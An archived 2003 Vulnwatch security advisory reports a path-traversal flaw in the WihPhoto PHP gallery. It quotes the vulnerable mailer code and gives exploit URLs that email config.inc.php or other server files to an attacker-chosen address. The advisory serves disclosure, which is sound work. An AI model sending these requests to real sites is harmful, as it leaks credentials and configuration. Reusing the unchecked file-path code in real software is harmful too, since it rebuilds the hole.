Vulnwatch mailing list archives

Previous By Date Next
Previous By Thread Next

WihPhoto (PHP)

From: "Frog Man" <leseulfrog () hotmail com>
Date: Sun, 23 Feb 2003 18:44:58 +0100

Informations :
°°°°°°°°°°°°°°
Version : 0.86-dev
Website : http://www.wihsy.com
problem : All files from the hard disk can be send by mail


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
util/email.php :

------------------------------------------------------------------------
<?
class CMailFile {
        var $subject;
        var $addr_to;
        var $text_body;
        var $text_encoded;
        var $mime_headers;
        var $mime_boundary = "--==================_846811060==_";
        var $smtp_headers;
function CMailFile($subject,$to,$from,$msg,$filename,$mimetype = "application/octet-stream", $mime_filename = false) { 
                $this->subject = $subject;
                $this->addr_to = $to;
                $this->smtp_headers = $this->write_smtpheaders($from);
                $this->text_body = $this->write_body($msg);
$this->text_encoded = $this->attach_file($filename,$mimetype,$mime_filename); 
                $this->mime_headers = $this->write_mimeheaders($filename, $mime_filename);
        }


        function attach_file($filename,$mimetype,$mime_filename) {
                $encoded = $this->encode_file($filename);
                if ($mime_filename) $filename = $mime_filename;
                $out = "--" . $this->mime_boundary . "\n";
                $out = $out . "Content-type: " . $mimetype . "; name=\"$filename\";\n";
                $out = $out . "Content-Transfer-Encoding: base64\n";
$out = $out . "Content-disposition: attachment; filename=\"$filename\"\n\n"; 
                $out = $out . $encoded . "\n";
                $out = $out . "--" . $this->mime_boundary . "--" . "\n";
                return $out;
// added -- to notify email client attachment is done
        }


        function encode_file($sourcefile) {
                if (is_readable($sourcefile)) {
                        $fd = fopen($sourcefile, "r");
                        $contents = fread($fd, filesize($sourcefile));
                        $encoded = my_chunk_split(base64_encode($contents));
                        fclose($fd);
                }
                return $encoded;
        }

        function sendfile() {
                $headers = $this->smtp_headers . $this->mime_headers;
                $message = $this->text_body . $this->text_encoded;
                mail($this->addr_to,$this->subject,$message,$headers);
        }

[...]

        function write_mimeheaders($filename, $mime_filename) {
                if ($mime_filename) $filename = $mime_filename;
                $out = "MIME-version: 1.0\n";
                $out = $out . "Content-type: multipart/mixed; ";
                $out = $out . "boundary=\"$this->mime_boundary\"\n";
                $out = $out . "Content-transfer-encoding: 7BIT\n";
                $out = $out . "X-attachments: $filename;\n\n";
                return $out;
        }
[...]
}
[...]
------------------------------------------------------------------------



sendphoto.php :

------------------------------------------------------------------------
include("util/email.php");

include("config.inc.php");

[...]
if (!$filled) {

print "<FORM METHOD=POST ACTION=sendphoto.php>\n";
print "<INPUT TYPE=hidden NAME=filled VALUE=1>\n";
print "<INPUT TYPE=hidden NAME=pic VALUE=$pic>\n";
print "<INPUT TYPE=hidden NAME=album VALUE=";
print rawurlencode($album);
print ">\n";
print "<center><p>$sendphoto_send_photo_to<br>";
print "<INPUT NAME=sendto></input></center>\n";
print "<p>\n";
print "<center><INPUT TYPE=submit VALUE=\"$sendphoto_button\"></center>\n";
print "</form>\n";
print "</body></html>\n";

}
else
{

$message  = "$sendphoto_message";
$album1 = rawurldecode($album);
$filetoattach = "./$pix_base/$album1/$pic";
$mimetype = "image/jpeg";
$newmail = new CMailFile($subject,$sendto,$replyto,$message,$filetoattach,$mimetype); 
$newmail->sendfile();

print "$sendphoto_successful";

print "</body></html>\n";
}

?>
------------------------------------------------------------------------



Exploits :
°°°°°°°°°°
http://[target]/sendphoto.php?album=..&pic=config.inc.php
or
http://[target]/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1
where [E-MAIL] is the mailbox where http://[target]/config.inc.php will be sent. 



Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info .


More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/WihPhoto.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWihPhoto.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n


_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis ! http://messenger.fr.msn.be
Previous By Date Next
Previous By Thread Next

Current thread: